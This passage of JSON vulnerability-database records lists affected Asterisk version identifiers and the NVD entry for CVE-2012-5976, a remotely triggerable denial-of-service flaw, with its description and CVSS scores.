"cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:05", "description": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol.", "cvss3": {}, "published": "2013-01-04T11:52:00", "type": "cve", "title": "CVE-2012-5976", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-02-02T05:10:00", "cpe": ["cpe:/a:digium:asterisk:1.8.2", "cpe:/a:digium:asterisk:10.5.1", "cpe:/a:digium:asterisk:1.8.3.2", "cpe:/a:digium:asterisk:1.8.2.4", "cpe:/a:digium:asterisk:10.5.2", "cpe:/a:digium:asterisk:10.3.1", "cpe:/a:digium:asterisk:10.7.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:1.8.3.3", "cpe:/a:digium:certified_asterisk:1.8.11", "cpe:/a:digium:asterisk:1.8.8.1", "cpe:/a:digium:asterisk:1.8.0", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:1.8.4", "cpe:/a:digium:asterisk:1.8.11.1", "cpe:/a:digium:asterisk:1.8.3.1", "cpe:/a:digium:asterisk:1.8.7.0", "cpe:/a:digium:asterisk:1.8.3", "cpe:/a:digium:asterisk:1.8.9.2", "cpe:/a:digium:asterisk:1.8.1.1", "cpe:/a:digium:asterisk:10.1.0", "cpe:/a:digium:asterisk:1.8.10.0", "cpe:/a:digium:asterisk:1.8.15.0", "cpe:/a:digium:asterisk:1.8.6.0", "cpe:/a:digium:asterisk:10.6.0", "cpe:/a:digium:asterisk:1.8.9.3", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:1.8.4.1", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:10.3.0", "cpe:/a:digium:asterisk:1.8.14.1", "cpe:/a:digium:asterisk:1.8.5", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:10.6.1", "cpe:/a:digium:asterisk:1.8.4.2", "cpe:/a:digium:asterisk:10.4.1", "cpe:/a:digium:asterisk:10.1.3", "cpe:/a:digium:asterisk:1.8.15.1", "cpe:/a:digium:asterisk:1.8.16.0", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.2.1", "cpe:/a:digium:asterisk:10.5.0", "cpe:/a:digium:asterisk:10.0.1", "cpe:/a:digium:asterisk:1.8.12", "cpe:/a:digium:asterisk:1.8.11.0", "cpe:/a:digium:asterisk:10.10.1", "cpe:/a:digium:asterisk:1.8.12.0", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:1.8.2.2", "cpe:/a:digium:asterisk:10.0.0", "cpe:/a:digium:asterisk:10.8.0", "cpe:/a:digium:asterisk:1.8.9.0", "cpe:/a:digium:asterisk:10.4.0", "cpe:/a:digium:asterisk:1.8.2.3", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:10.1.1", "cpe:/a:digium:asterisk:1.8.7.1", "cpe:/a:digium:asterisk:1.8.13.0", "cpe:/a:digium:asterisk:10.1.2", "cpe:/a:digium:asterisk:1.8.8.0", "cpe:/a:digium:asterisk:1.8.8.2", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:10.7.1", "cpe:/a:digium:asterisk:1.8.1", "cpe:/a:digium:asterisk:1.8.14.0", "cpe:/a:digium:asterisk:1.8.13.1", "cpe:/a:digium:asterisk:10.2.0", "cpe:/a:digium:asterisk:1.8.4.4", "cpe:/a:digium:asterisk:1.8.4.3", "cpe:/a:digium:asterisk:1.8.5.0", "cpe:/a:digium:asterisk:10.2.1", "cpe:/a:digium:asterisk:1.8.9.1", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:1.8.1.2", "cpe:/a:digium:asterisk:1.8.10.1", "cpe:/a:digium:asterisk:10.4.2", "cpe:/a:digium:asterisk:10.9.0", "cpe:/a:digium:asterisk:11.0.2"], "id": "CVE-2012-5976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*", 